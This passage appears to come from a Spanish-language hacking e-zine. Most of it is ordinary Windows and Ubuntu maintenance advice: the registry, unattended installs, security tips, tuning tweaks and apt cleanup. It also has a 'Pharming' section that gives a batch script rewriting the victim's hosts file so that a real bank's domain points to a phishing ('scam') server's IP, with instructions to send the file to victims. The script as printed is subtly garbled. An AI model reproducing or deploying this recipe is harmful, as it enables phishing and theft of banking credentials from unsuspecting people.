y en programación en general debe continuar el estudio de su funcionamiento. 4.0 Radiografiando Windows: Su Esqueleto Reside En El Registro Si analizamos Windows como si radiografiásemos a un ser humano comprobaríamos que Windows también cuenta con un soporte estructural al que podríamos denominar esqueleto, el pilar fundamental que estructura el organigrama del funcionamiento del sistema seria algo así como el centro de operaciones donde se ejecutan todas las ordenes ,procesos y que guarda toda la información de vital importancia. A ese cuaderno de bitácora se le denomina registro, por motivos obvios, en el se encuentran archivados cronológicamente todos los sucesos desde la puesta en funcionamiento del sistema en su instalación hasta los acontecimientos mas actuales. Por todo esto el registro es la parte más delicada del sistema y por eso la más problemática a la que deberemos prestar especial atención para salvaguardar el correcto funcionamiento del sistema operativo. 4.1 Analizando el registro, sus partes Para acceder al menú de registro en Windows debemos usar la siguiente ruta: desde el menú inicio>ejecutar>y escribimos el comando regedit, una vez hecho esto se nos abrirá la siguiente ventana donde podremos visualizar la información donde accederemos a las opciones fundamentales de registro con todas las claves y subclaves. Como se puede apreciar en esta imagen al acceder a la ventana principal del registro lo primero que nos encontramos son cinco desplegables que abarcan las principales funciones derivadas de Mi PC, continuación vamos a especificar y detallar el uso que se le asigna a cada una de ellas. HKEY_CLASSES_ ROOT La información que se almacena aquí garantiza que cuando abra un archivo con el Explorador de Windows se abrirá el programa correcto. HKEY_CURRENT_USER Contiene la raíz de la información de configuración del usuario que ha iniciado sesión. Las carpetas del usuario, los colores de la pantalla y la configuración del Panel de control se almacenan aquí. HKEY_LOCAL_MACHINE Contiene información de configuración específica del equipo (para cualquier usuario). HKEY_USERS Contiene todos los perfiles de usuario cargados activamente en el equipo. HKEY_CURRENT_CONFIG Contiene información acerca del perfil de hardware que utiliza el equipo local cuando se inicia el sistema. Bien, como podemos observar todas las funciones y aplicaciones que ejecuta Windows están intercomunicadas a través del registro, por lo que un fallo en cualquiera de sus datos puede ocasionar un desequilibrio en el sistema cuya gravedad será determinada por la importancia de la clave o subclave que haya sufrido la modificación errónea. Es muy importante que tengamos esto en cuenta cuando nos dispongamos a modificar cualquier dato en el registro puesto que si nos equivocamos podemos afectar al funcionamiento de una o varias aplicaciones del sistema incluso podemos dañarlo seriamente e imposibilitar su recuperación. 4.2 Problemas más comunes del Registro de Windows. Acabamos de nombrar uno de los problemas más recurrentes del registro de Windows que suele ser en la mayoría de los casos erróneas modificaciones realizadas por usuarios inexpertos que desconocen el significado o valor del elemento modificado, pero esta no es la única causa que puede originar errores en nuestro sistema puesto que esta causa podríamos denominarla como “voluntaria” ya que el usuario es consciente de que procede a realizar una modificación asumiendo los riesgos que esta puede ocasionar, pero existen otras causas “involuntarias” que generalmente escapan a nuestro control y en la mayoría de los casos no se detectan a tiempo, lo que produce que el sistema operativo se vuelva cada vez mas lento e inestable perdiendo su funcionabilidad inicial. Algunas de ellas pueden ser: * Errores en la instalación/desinstalación de programas Cuando instalamos un nuevo programa el registro asume los valores de las claves y subclaves que necesita dicho programa para funcionar cada vez que usamos ese programa estamos generando nuevas entradas para su posterior utilización. Cuando nos disponemos a desinstalar un programa, normalmente usamos un asistente de desinstalación como pueden ser el agregar/quitar programas de Windows o el asistente de desinstalación del mismo programa, por lo que la eliminación del programa suele ser parcial, ya que el asistente logra eliminar la mayor parte de las entradas de registro se crearon en el momento de la instalación pero en muchas ocasiones no llegan a eliminarse la totalidad de entradas que se generaron en el periodo de utilización del mismo, algo que al tiempo es causa ralentización e incluso puede ocasionarnos conflictos con otros programas que instalemos. * Incompatibilidad en la instalación de aplicaciones de software Puede darse el caso que en algún momento instalemos programas que por su ingeniería de software resulten completamente incompatibles, esta situación es algo inusual y solo podría ocurrir si nuestro registro esta dañado o no funcionase correctamente por lo que no lograríamos detectar el error, por ejemplo el antivirus NOD32 es incompatible con Kaspersky el asistente de instalación de uno obliga la desinstalación previa del otro pero si la desinstalación no se ejecuto correctamente o no se eliminaron todas las claves del registro puede llegar a quedar alguna entrada residente que fluctúe con el funcionamiento del programa. * Malwares Los malvares en general y los virus en particular causan innumerables daños al registro en muchas ocasiones conseguimos deshacernos del virus en cuestión pero no eliminamos las entradas de su registro en Windows o no podemos estabilizar las aplicaciones que se vieron afectadas por el. * Software que origina problemas de detección de hardware Pues si, hay programas que pueden llegar a desestabilizar el equilibrio armónico de nuestro hardware ocasionándonos problemas que antes no teníamos, ejemplo de ello serian los programas creadores de unidades virtuales de disco tales como alcohol 120 Daemon Tools, etc. Muchas veces con la desinstalación de este software no logramos desinstalar la unidad que fue creada por lo que Windows interpreta esto como un fallo, que se aloja en el registro y en ocasiones se manifiesta como como hardware no reconocido pudiendo ocasionar fallos en nuestra unidad de disco real como que no se puedan leer datos o incluso puede no estar visible. * Exceso de aplicaciones instaladas Sobrecargar nuestro sistema con aplicaciones innecesarias hacen que se vuelva lento e inestable, por lo que cada vez que vallamos a añadir una nueva funciona a través de la instalación de un nuevo programa seria muy útil reflexionar primero sobre si realmente lo necesitamos y estar seguros de que no va interferir con ninguna otra aplicación que tengamos ya instalada. Hay que tener en cuenta que el cómputo total de aplicaciones y utilidades que poseemos no son solo los programas sino todo elemento ajeno a Windows que hemos añadido para que desempeñe una función complementaria. * Exceso de entradas vacías e inutilizables Como hemos visto, las numerosas instalaciones y desinstalaciones de programas dejan secuela en el registro de Windows pues en pocas ocasiones se consiguen eliminar la totalidad de entradas creadas por nuestras instalaciones y dejar el registro en el estado inicial, por lo que este se va deteriorando progresivamente y uno de los principales síntomas es la lentitud. 4.3 Soluciones a la problemática del registro Con los conocimientos adecuados casi todos los problemas tienen solución y el registro de Windows no es una excepción para esto por lo que se pueden plantear soluciones viables para cada uno de los problemas mencionados en el punto anterior. *Completar la desinstalación de los programas Cuando vallamos a desinstalar un programa que no queramos usar debemos eliminar también sus entradas, para ello podemos usar un desinstalador que incluya esta función (como Regcleaner) o eliminar las entradas manualmente * Ínstala solo software compatible. Debemos asegurarnos cuando procedamos a instalar una nueva aplicación en nuestra maquina la total compatibilidad con el resto de componentes que tengamos instalados. * Fulmina a los malware Para minimizar el daño de las aplicaciones malignas es conveniente detectarlas cuanto antes, para ello cualquier antivirus que posea una buena heurística servirá y para que el resultado sea efectivo deberíamos combinar el antivirus con un potente antispyware. * No instales ningún programa ni componente del cual desconozcas su funcionamiento. Te ahorraras muchos dolores de cabeza y algún que otro formateo si antes de instalar algún componente como una unidad virtual, te lees un manual para aprender a instalarla correctamente y asegurarte de que la desinstalación se no va a ocasionar problemas. * Consigue ayuda extra Existen muchas utilidades que pueden ayudarte a mantener el registro en buen estado prolongando la estabilidad de tu sistema, son programas que incluyen funciones como limpieza de registro, optimización, compresión…….o todas juntas simplemente es cuestión de probar y valorar los resultados, la oferta es verdaderamente amplia. 5.0 Desatenciones y Descortesias ¿Qué es un Windows desatendido? Después de conocer los entresijos del registro de Windows se llega a la conclusión que modificar su contenido resulta extremadamente sencillo, la captación de esta idea ha tenido una gran magnitud entre los usuarios por lo que me parece útil dedicar un breve espacio al desarrollo de la idea de modificar Windows mediante la cual se ha obtenido como resultado multitud de versiones derivadas del patrón original a las que se le han llamado versiones modificadas o desatendidas. 5.1 ¿En que consiste exactamente un Windows desatendido? Pues generalmente se trata de efectuar modificaciones en las que normalmente se eliminan determinadas aplicaciones con el objetivo de hacerlo más funcional y rápido .También se añaden programas de utilidad al paquete de instalación para completar su contenido y suele distribuirse de manera gratuita por sus desarrolladores. El software se instala en una sola sesión permitiendo al usuario decidir que programas desea instalar y cuales no. Todos los programas añadidos suelen incluir licencias lo que facilita la tarea de la instalación. Algunas versiones desatendidas han resultado verdaderamente populares entre los usuarios de Windows como por ejemplo las modificadas por Bj quien según los rumores concluyo su serie de versiones desatendidas con su séptimo lanzamiento por supuestas presiones de Microsoft. 5.2 ¿Son fiables las versiones desatendidas de Windows? Eso depende de su creador, si te decides a instalar una versión no oficial de Windows antes de es preferible constatar la reputación de la versión que quieres instalar y evaluar todas las fuentes y comentarios de la misma pues si bien es cierto que algunas han ofrecido excelentes resultados la fiabilidad no esta garantizada por ello. Debemos considerar que Windows es un proyecto en expansión, es decir no esta cerrado sino que se actualiza constantemente, se renueva y se modifica por lo cual es absolutamente mejorable. Por tanto es muy probable que puedan obtenerse versiones mas perfectas que el mismo Windows, solo que muchas veces para la obtención de algo mejor se requieren largos procesos de estudio para evaluar todos los detalles y como cada una de las modificaciones realizadas puede influir en el desarrollo del sistema y la fiabilidad, por lo que este procedimiento no suele tenerse en cuenta a la hora de excluir aplicaciones y en ocasiones pueden surgir problemas durante su uso, unos de los problemas mas generalizados en el uso de versiones desatendidas suele estar en los controladores lo que ocasiona comúnmente problemas en la instalación de los drivers , la causa probablemente se encuentre en que se han reducido la lista de los fabricantes a los de uso mas genérico por lo que aquellas personas que adquieran un hardware de marcas poco conocidas pueden verse afectadas ya que su hardware no pasara la prueba de reconocimiento de Windows y aunque puede omitirse este paso y continuar la instalación de todos modos puede representar un problema de inestabilidad en el futuro u otras series de complicaciones por este motivo. Además algunas de las aplicaciones excluidas que aparentemente resultan prescindibles, han sido integradas en Windows por una razón algo que no debemos descartar para posibles restauraciones del sistema ,además si nos vemos obligados a recurrir a algún manual de ayuda para resolver algún problema en el que debamos realizar modificaciones en el registro el proceso puede no resultar el mismo la mayoría de tutoriales de reparación han sido extraídos total o parcialmente de Microsoft por lo que si tu versión es modificada puedes no contener las mismas entradas de registro o incluso que te falten valores establecidos por Microsoft cosa que puede dejarte solo ante el peligro y que tengas que reinstalarlo de nuevo para subsanar el problema. Por lo que mi consejo para resumir este punto seria que ante la duda de que versión de Windows instalar ,decantarse siempre por la versión oficial y solo si buscamos potenciar los recursos de nuestro equipo para redireccionarlos hacia una actividad especifica que nos obligue a “aligerar” Windows probemos una versión desatendida para evaluar si nos compensa las modificaciones pero siempre teniendo en cuenta que vamos a poder prescindir de determinadas funciones en el futuro que no suelen incluirse en las versiones desatendidas y que no vamos a depender constantemente de los manuales de ayuda, pues es mas que probable que para determinados conflictos no nos sirvan. 5.3 Creando Windows. ¿Qué necesercito para crear mi propia versión desatendida? Cualquiera que tenga algo de experiencia con Microsoft Windows y conocimientos básicos de cómo funcionan los ficheros de proceso por lotes (batch) puede crear un Windows desatendido y ajustarlo según sus preferencias además de tener conocimientos sobre scripting para la edición de archivos en batch para la construcción de las estructuras principales como $OEM$,necesitaremos un programa que nos ayude a instalar las aplicaciones complementarias tales como service pack ,drivers y los programas que queramos añadirle al paquete de instalación para eso usaremos el programa nlite, software de licencia gratuita que nos ayudara a crear un archivo de imagen con todos los componentes de Windows y las aplicaciones complementarias , permitiéndonos crear un CD booteable que podamos arrancar desde la unidad de disco y ejecutar una instalación limpia con todo incluido. Existen muchos tutoriales por la red sobre el funcionamiento de Nlite y de varios métodos de creación de Windows desatendidos. 6.0 Windows vs seguridad Algo que ha preocupado siempre a la industria por las valoraciones recogidas entre los usuarios de Windows es su aparente vulnerabilidad que consigue que sea presa continua de constantes infecciones de todo tipo de malware .La propagación de las infecciones, es tal que se especula que el 90% de los ordenadores conectados a la red, estarían infectados con algún tipo de software malicioso. 6.1 ¿Es Windows un sistema operativo inseguro? Si partimos de la base que cualquier ordenador que tenga acceso a Internet es vulnerable, entonces cualquier sistema operativo lo es, pero eso no explica porque Windows siempre se lleva la peor parte si lo comparamos con el resto de sistemas operativos mas usados como Linux o MAC. Por eso una vez que hemos profundizado en Windows y entendido su funcionamiento podemos comprender las razones por lo que es blanco fácil de infecciones. Una de los principales motivos causantes de la vulnerabibilidad de Windows son fallos en su programación ejemplo de ello se refleja en su sistema de archivos ya que graba la información desparramada por todo el disco duro (lo cual produce la famosa fragmentación) y gasta los cabezales del disco duro haciéndolo trabajar en exceso. Si hemos seguido el historial de versiones de Windows con atención, habremos comprobado que en sus primeros desarrollos no estaban incluidas las funciones de red esto explica que el patrón original, no se fabrico con la pretensión de incluir esta función, algo que conforme iba aumentando el uso generalizado de Internet obligo a Que Microsoft incluyese a marchas forzadas funciones de red y modificar los patrones de seguridad conforme se iban añadiendo nuevas funciones ,pero el diseño primario no fue pensado para esa función y no debemos olvidar que la secuencias de versiones Windows mantienen compatibilidad con los prototipos mas antiguos por lo que parte de su código fuente sigue siendo el mismos salvaguardando las actualizaciones. También contribuye la limitación de las cuentas de usuario, pues obliga en determinadas ocasiones a acceder al sistema con privilegios de administrador con los riesgos que conlleva. Y por lo ultimo pero no menos importante Windows es el sistema operativo mas popular y la elección mayoritaria de todos los usuarios que lo siguen prefiriendo antes que a Mac por el precio de este ultimo y a Linux por la facilidad de uso lo que convierte a Windows en el objetivo principal de los atacantes que pretenden llegar al mayor numero de usuarios. 6.2 ¿Entonces todo es culpa de Windows? Que Windows tenga importantes Bugs de seguridad y sea propenso a ser atacado no significa que siempre que nos infecten sea culpa del sistema, pues la forma en la que lo usamos es totalmente determinante para su correcto funcionamiento. 6.3 ¿Que precauciones debo tomar para que no me infecten? Como cualquier ordenador con conexión esta expuesto, debemos tomar una serie de medidas que ayude a nuestro indefenso Windows a mantenerse a salvo de los ataques, no se trata de obsesionarse con el tema de la seguridad, sino simplemente de ser un poco precavidos puesto que la mejor medida pasa por la prevención por lo que la mejor forma de no infectarse es evitar que suceda para ello debemos de vigilar todo material que sea introducido en nuestro ordenador de manera directa o indirecta: * No abrir correos si no conocemos al remitente. * Configurar nuestro programa asiduo de mensajera para que cualquier mensaje que llegue a nuestra bandeja de entrada sea analizado por nuestro antivirus residente, * Si descargamos software por Internet que sea siempre de páginas de confianza, puesto que un gran numero de infecciones se contraen por descarga de programas de fuentes poco recomendables, * Evitar todo lo posible crack o keygens que son por lo general un almacén de virus * Vigilar los puertos que tenemos abiertos cerrando aquellos que sean peligrosos ya que algunos pueden ser una entrada directa para troyanos. * Ojo con los programas espías que aunque no son virus constituyen una seria amenaza para el funcionamiento de nuestra maquina para evitarlos nada mejor que un buen antispyware. * Vigilar los componentes que se instalan con los programas que más de uno suelen colar regalitos como una toolbar que es una barrita de búsqueda que lleva un Spyware que recopila información sobre nuestras búsquedas y preferencias en la red para usarlos con fines comerciales. * Si aprecias tu seguridad cambia de navegador Web, esta absolutamente comprobado la falta de seguridad en Internet Explorer, por lo que cualquier alternativa a este seria mas recomendable, Firefox es un estupendo navegador que además incluye muchos complementos en su pagina oficial para poder personalizarlo a tu gusto 6.4 Ya me infectaron ¿Tiene solución? Cuanto antes lo detectemos antes podremos reparar el daño ,si la infecciones es de un virus, gusano, Troyano…..normalmente el antivirus nos da la voz de alarma, por lo que el problema suele solucionarse “in situ” ya que o bien el antivirus evito la instalación o con un análisis a fondo se enviaron los archivos sospechosos a cuarentena, el problema viene cuando la infección no ha sido detectada a tiempo y ha hecho estragos en el sistema, normalmente solemos darnos cuenta porque el PC se ralentiza o porque comienzan a activarse aplicaciones que no hemos ejecutados y otros errores similares. Aunque si el virus afecto severamente nuestro equipo podemos toparnos con problemas más serios como que no podamos iniciar Windows o hayamos perdido parte de la informacion almacenada en el, ante cualquier síntoma de amenaza deberemos de actuar de la siguiente forma. * Arrancar el PC en modo seguro. * Finalizar procesos sospechosos * Mostrar archivos ocultos del sistema. * Comprueba las carpetas de los programas por si se añadió algo que no estaba. * Limpiar archivos temporales y el cache del navegador. * Analizar el PC a fondo con el antivirus y el antispyware. * Borrar las entradas que hubiese creado el virus en nuestro registro manualmente si fuese necesario. *Si no lo solventamos con todo lo anterior podemos usar la consola de recuperación de Windows para restaurar el sistema sin formatear. * Formatear como ultimo recurso. 6.5 Congelando el registro. Windows eternamente joven Una práctica alternativa a la restauración del sistema de Windows (que por otra parte puede llegar a ser peligrosa ya que muchos virus pueden quedar residentes en la última restauración por tanto recuperar amenazas que habían sido eliminadas) es congelar el registro. Esto se consigue con un programa como Deepfreeze una vez que hayamos completado la instalación de Windows ejecutamos deepfreeze y este bloqueara el registro impidiendo cualquier cambio no autorizado. El único inconveniente es que cada vez que instalemos algún programa que requiera crear entradas de registro para funcionar tendremos que desbloquear deepfreeze por lo que no es un método muy recomendable para los que están continuamente instalando y desinstalando aplicaciones. 7.0 Optimizando Windows Cuando completamos la instalación de Windows y nos disponemos a hacer uso de el podemos comprobar que funciona perfectamente respondiendo con agilidad y rapidez a nuestra manipulación, pero estas apreciadas cualidades van desapareciendo progresivamente a medida que hacemos uso de el, ya hemos visto causas que pueden afectar a su funcionamiento y ahora vamos a cerrar esta sección con una pequeña lista de consejos para sacarle el máximo partido. * Como un coche necesita ir al taller de vez en cuando para una puesta a punto, Windows necesita ser reparado periódicamente de los errores que se van acumulando en las sesiones de uso, para ello contamos con herramientas que incluyen paquetes de aplicaciones básicas para su mantenimientos como limpiadores y correctores de registro ,limpiadores de archivos temporales etc. Podemos adquirir estas aplicaciones por separado o con un programa que incluya las mas esenciales como por ejemplo el tune up utilities, paquete de utilidades de mantenimiento para Windows. * Tener el PC bien configurado siempre ayuda; Si conocemos los recursos de nuestra maquina y le aplicamos una configuración correcta el resultado será siempre mas optimo y se vera reflejado en el rendimiento. * No instales demasiadas aplicaciones; Ya hemos visto lo que supone para el registro tener el PC sobrecargado y los problemas que ocasiona, por lo que es recomendable instalar solo los programas que vayas a usar realmente. * Portables o no portables e aquí la cuestión. Una buena alternativa para no tener el PC sobrecargado de programa es usar versiones portables. Hubo un tiempo en el que los programas eran mucho mas livianos y no se requería la instalación en el ordenador, pero la ampliación de los recursos de las maquinas y la suma de aplicaciones extras que comenzaron a añadirle a los programas hicieron necesaria la instalación permanente de los mismos para funcionar. Pero con el uso generalizado de memorias portátiles se volvió a la tendencia de hacer los programas mas ligeros y no tener que instalarlos, estas versiones solo crean las entradas necesarias en el registro para funcionar pero no lo modifican como lo haría una instalación permanente, aun así cabe destacar cuando es útil realizar un portable y cuando no. Portables Si: En programas que consuman muchos recursos que no sean prescindibles para el funcionamiento de Windows como por ejemplo Photoshop, grabadores, reproductores y en general cualquier programa de uso esporádico. Portables No: El navegador Web, el antivirus un compresor, el reproductor de Windows media, la suite de oficina, el visor PDF y al menos un programa de mensajería. Estos programas son recomendables que los tengas correctamente instalados y actualizados en el PC. * Y por ultimo voy a indicaros unas pequeñas modificaciones que me gusta hacer tal y como finalizo la instalación de Windows que no interfieren en su funcionamiento pero que resultan increíblemente practicas. - Tal y como instalo un Windows lo primero que hago es quitarle la palabra, es decir, dejarlo Completamente mudo. A no ser que te encanten esos sonidos estridentes de cuando se abre y se cierra sesión por no mencionar los esperpénticos sonidos de los errores no los vas a echar de menos, para ello abre la carpeta de Windows y elimina todos los archivos de la carpeta media, ¡ojo!! Solo los archivos, no borres la carpeta si no quieres tener errores. - Otra de las cosas mas inútiles que vienen incluidas en Windows por si no os habíais dado cuenta es el menú de ayuda para no volver a toparnos con el volvemos a la carpeta Windows y eliminamos todos los archivos de la carpeta help. Si eres de los que acude corriendo al solucionador de problemas cada vez que falla algo ni se te ocurra eliminarla pues no se iniciaría nunca más. - Una de las cosas más desesperantes de Windows es lo que tarda en abrir y cerrar sesion, algo que podemos aligerar modificando algunas entradas de registro. Para apagarlo mas rápido localizamos la siguiente clave de registro HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control Localiza nuevamente la clave WaitToKillAppTimeout y vuelve a cambiar el valor de 20.000 por 4.000 Cerramos el Editor del Registro y ahora Windows esperará menos tiempo para cerrar las aplicaciones y el sistema. Para que se encienda antes .Busca "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction" Selecciona "Enable" de la lista de la derecha Botón derecho y selecciona 'Modificar' Cambia el valor a "Y" Reinicia el ordenador. - Deshabilita servicio innecesarios como Windows XP necesita ser un sistema orientado para todos tiene un montón de servicios corriendo que ralentizan el sistema y que muchos de ellos no necesitas. Aquí hay una lista de los que pueden deshabilitarse prácticamente en todas las máquinas: * Servicio de alerta * Portafolios * Examinador de equipos * Cliente de seguimiento de vínculos distribuidos * Compatibilidad de cambio rápido de usuario * Ayuda y Soporte técnico - (si usas la ayuda de windows alguna vez no lo toques) * Acceso a dispositivo de interfaz humana * Servicio de Index Server * Servicios IPSEC * Mensajero * Escritorio remoto compartido de Netmeeting (deshabilitado por seguridad) * Portable Media Serial Number Service * Administrador de sesión de Ayuda de escritorio remoto (deshabilitado por seguridad) * Administración de conexión automática de acceso remoto * Registro remoto (deshabilitado por seguridad) * Remote Registry Service * Inicio de sesión secundario * Enrutamiento y acceso remoto (deshabilitado por seguridad) * Servidor * Servicio de descubrimientos SSDP – * Telnet * Ayuda de NetBIOS sobre TCP/IP * Administrador de carga * Host dispositivo Plug and Play Universal * Horario de Windows * Configuración inalámbrica rápida (no lo desactives si usas WIFI) * Estación de trabajo Para poder deshabilitar esos servicios: 1. Ve a Inicio -> Ejecutar, y teclea "services.msc" 2. Pulsa doble click en el servicio que quieras deshabilitar 3. Cambia el tipo de inicio a "Deshabilitado" o "Disable" (según sistema) - Deshabilita "Restaurar Sistema""Restaurar sistema" puede ser de gran ayuda si tu ordenador tiene problemas, aun así, guardar todos los puntos de restauración puede ocupar gigas y gigas de espacio en tu disco duro. Por tanto, para deshabilitarlo: 1. Abre el Panel de Control 2. Pulsa en "Rendimiento y Mantenimiento" 3. Pulsa en "Sistema" 4. Abre la pestaña de Restaurar Sistema 5. Activa 'Desactivar Restaurar sistema en todas las unidades' 6. Pulsa 'OK' - Defragmenta el archivo de página Si mantienes defragmentado este archivo puedes tener un aumento considerable de velocidad de arranque. Una de las mejores formas de hacer esto es crear una partición separada en tu disco duro sólo para esto, con lo que no se ve afectado por el uso normal del disco duro. Otra forma de tener este archivo defragmentado es correr la aplicación PageDefrag. Este pequeña y útil aplicación puede ser usada para defragmentarlo, pero también para fijar que se defragmente cada vez que inicias el ordenador. Para instalarla: 1. Descarga y ejecuta PageDefrag 2. Señala "Defrag at next Reboot" 3. Pulsa "Aceptar" 4. Reinicia - Acelera el acceso a carpetas - Deshabilita Last Access Update Si tienes muchas carpetas y subcarpetas en tu ordenador, notarás que el acceso a dichas carpetas consume mucho tiempo, ya que Windows XP tiene que actualizar la hora de último acceso a cada una de ellas. Para parar esto simplemente hay que editar el registro del sistema. Si crees que es demasiado complicado no lo hagas, pero no es difícil.. 1. Ve a Inicio -> Ejecutar y teclea "regedit" 2. Ves navegando por el árbol de la izquierda hasta llegar a "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem" 3. Pulsa con el botón derecho en el área de la ventana de la derecha y selecciona 'Valor DWORD' 4. Crea por tanto un nuevo valor DWORD y llámalo 'NtfsDisableLastAccessUpdate' 5. Botón derecho en el nuevo valor y pulsa 'Modificar' 6. Cambia el valor a '1' 7. Pulsa 'Aceptar' -Haz que los menús vayan más rápido 1. Ve a Inicio -> Ejecutar 2. Teclea 'Regedit' 3. Busca la cadena "HKEY_CURRENT_USER\Control Panel\Desktop" 4. Selecciona "MenuShowDelay" 5. Botón derecho y selecciona 'Modificar' 6. Reduce el número a unos "100″ Este es el retardo en microsegundos que tienen los menús. Puedes ponerlo a "0″ pero te resultará un poco difícil usar entonces los menús. Bueno ahora mira a ver el menú si te gusta y vá rápido. Si quieres puedes modificar estos valores entrs 50 y 150 según tu gusto. Funcionalidad y apariencia son dos cualidades reñidas por lo que si prefieres tener un equipo veloz yo que tu me abstendría de llenar el escritorio de iconos ,de tener muchos programas ejecutándose al inicio de mi sesión y de poner salvapantallas, themes o fondos de escritorio (utiliza los cuadros de tu casa) Porque todas esas cosas consumen recursos y los que utilices para una cosa no los vas a poder usar para otra así que hay que establecer prioridades, por cierto la vista clásica en las carpetas o tema clásico de Windows son los mas funcionales ,aunque no los mas atractivos, pero eso ya es cuestión de preferencias, espero que os hayan servido estos consejos. Seccion Linux By: Lessiem Limpiando Nuestro Linux Estan todos tan contentos con el increíble funcionamiento de su nuevo sistema operativo. Anonadados con las increíbles posibilidades que el software libre les brinda... vamos, como niños con zapatos (software) nuevos. Claro, hay tanto y tan bueno y ¡gratis! que no son capaces de resistir la tentación de instalar e instalar y re-instalar... Peeero, resulta que tras tanto instalar, poco a poco nos quedamos sin espacio en el disco duro (por muy bueno que sea Linux, contra eso, todavía no puede hacer nada: "el espacio, el espacio"). Bueno, pues tenemos la opción de desinstalar desde el Gestor de Paquetes Synaptic aquel software que hallamos instalado a través de este medio... ¿pero y todo esos paquetes que hemos añadido por nuestra cuenta y riesgo desde el "exterior"? Tranquilos, a continuación, les propongo unas simples acciones para, no sólo desistalar esos paquetes que no sabemos como quitar de nuestra PC, sino también para mantener "up-to-date" nuestro sistema: Paso 1) Updatedb: es un comando incluido en findutils que se encarga de actualizar una base de datos con todos los achivos del sistema, utilizada por locate para hallar archivos rápidamente en sistemas de grandes cantidades de ficheros o incluso distintos dispositivos y sistemas de ficheros. Hacemos: sudo updatedb Paso 2) Locate: es un comando del paquete findutils de GNU que provee una fácil y rápida manera de buscar archivos en el sistema completo basado en patrones de nombres. El comando es mucho más rápido (aunque menos flexible) que find, pues utiliza los datos en una base de datos temporal que almacena los nombres de todos los archivos en el sistema, por lo que también se pueden experimentar fallas al buscar un archivo creado recientemente. Hacemos: locate "nombre_del_paquete_a_desinstalar" | less Paso 3) Localizamos todas las rutas de ficheros arrojados por locate en el terminal y, con un poco de paciencia, vamos borrando poco a poco todas las entradas de los ficheros del paquete que queremos desinstalar. A partir de este punto, podemos realizar los siguientes pasos de forma periódica sobre nuestro sistema para tenerlo al 100% de funcionamiento ya que, al igual que en otros Sistemas Operativos, tras muchas instalaciones y desinstalaciones, Ubuntu puede quedar repleto de paquetes y claves innecesarias que lo único que hacen es ocupar espacio. Seguimos: Paso 4) Eliminar paquetes residuales: Sistema->Administración-> Gestor de Paquetes Synaptic. Su función es eliminar paquetes que quedaron en el sistema y que eran dependencias para instalar algún otro, pero que al desinstalarlo no se eliminaron. Para hacerlo manualmente seleccionamos en la izquierda el filtro que pone: Estado -> No instalados (conf. residual), y nos aparecerá una lista con todos ellos. Para eliminarlos pinchamos con el botón derecho sobre cada uno de ellos y seleccionamos “Marcar para eliminar completamente“. Finalmente hacemos “Aplicar” para borrarlos por completo del sistema. NOTA: si no nos aparece la opción No instalados (conf. residual), ¡joya! tienes un sistema en perfecto funcionamiento. Paso 5) Utilizar AutoClean: Esta es una opción incluída en el Apt del Sistema. Lo que hace es eliminar paquetes de descargas incompletas o canceladas por alguna razón. Como no sirven para nada, simplemente abrimos una consola y escribimos: sudo apt-get autoclean Y automáticamente se eliminarán todos esos paquetes: te sorprenderas de la cantidad de espacio que podes llegar a liberar mediante esta opción. Paso 6) Eliminar Traducciones: Un locale es un conjunto de reglas culturales que definen el país, idioma, caracteres y otras preferencias de la interfaz del usuario. Cuando instalamos un programa, es probable que se instalen locales de varios idiomas, por lo que a la larga tendremos el equipo lleno de traducciones que no nos interesan. Para eliminarlas instalamos un paquete llamado localepurge: sudo apt-get install localepurge Inmediatamente después de instalarlo aparece una pantalla en el terminal donde se deben seleccionar los idiomas que utilizaremos, en nuestro caso los del español y también ingles, ya que algunas aplicaciones no están traducidas. Puedes quedarte con estos: * en * en_US * en_US.ISO-8859-15 * en_US.UTF-8 * es_ar * es_ES * es_ES@euro * es_ES.UTF-8 Para ejecutarlo posteriormente simplemente escribimos en una consola: sudo locale Lo interesante de este paquete es que posteriormente, al instalar alguna otra aplicación lo llama inmediatamente y elimina del programa las traducciones en los idiomas que no marcamos. Paso 7) Ubucleaner: es un script para Ubuntu que nos permite limpiar el cache del apt, remover los archivos de configuracion de paquetes “deb” que se han desinstalado, remover los kernels instalados -y no quitar solo su llamada del GRUB- (menos el que se esta usando, claro) y vacía las papeleras de todos los usuarios, de una manera rapida, sencilla y transparente para el usuario. ¿Como usarlo? Descargamos el script en cuestión desde aquí Abrimos nuestra consola desde la carpeta donde hayamos guardado el fichero y damos permisos de ejecución al archivo descargado. chmod -c 744 71529-ubucleaner.sh Ejecutamos el script: sudo ./71529-ubucleaner.sh Le decimos a todas las opciones que sí, y listo, Ubuntu como nuevo. NOTA: No me hage responsable del posible mal funcionamiento de cualquiera de las herramientas de mantenimiento mencionadas anteriormente (tampoco tienen por qué funcionar mal). Con estos sencillos pasos, conseguiras tener un sistema bueno, bonito, barato y que además, funciona bien. FIN Seccion Pharming By: Lessiem ¿Que es Pharming y como Efectuarlo? Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio. Que seria la pagina falsa (scam) asi obtienen datos de la victima. Pasos para Efectuar la Tecnica: 1.- Abrimos el block de notas y pegamos el siguiente codigo: @echo off 120.00.00.00 www.xxxxxx.com >> %windir%system32driversetchosts exit 2.- Editamos la siguiente linea "120.00.00.00 www.xxxxxx.com. 3.- En donde sale 120.00.00.00 ponemos la ip que consegimos haciendo un simple ping a nuestro scam ya montado. Y en www.xxxx.com ponemos la web victima: @echo off 66.45.237.220 www.bancoestado.com >> %windir%system32driversetchosts exit 3.- Guardamos con la extension .bat 4.- Compilamos el archivo y se lo enviamos a la victima. La victima lo abre y cuando ingrese a la web www.bancoestado.com se redirijira a la web scam. Por consiguiente quedaria de esta forma: Para hacer pharming se recomienda mayormente disponer de un servicio de hosting privado para subir nuestro scam y que nos provea de una IP dedicada FIN Seccion Nmap By: V4ndid4 1 - Nmap * Que es NMAP? NMAP = Network Mapper Es un software gratuito de codigo abierto de utilidad para la exploracion de red o de auditoria de seguridad. Nmap usa los paquetes IP en bruto en nuevos metodos para determinar que hosts estan disponibles en la red, que servicios (aplicacion nombre y version), los anfitriones ofrecen, que sistemas operativos (y versiones) que se estan ejecutando, que tipo de paquete de filtros / firewalls estan en uso, y muchas caracteristicas mas. * Para que sirve? Por si queda alguna duda aclaro: NMAP es un 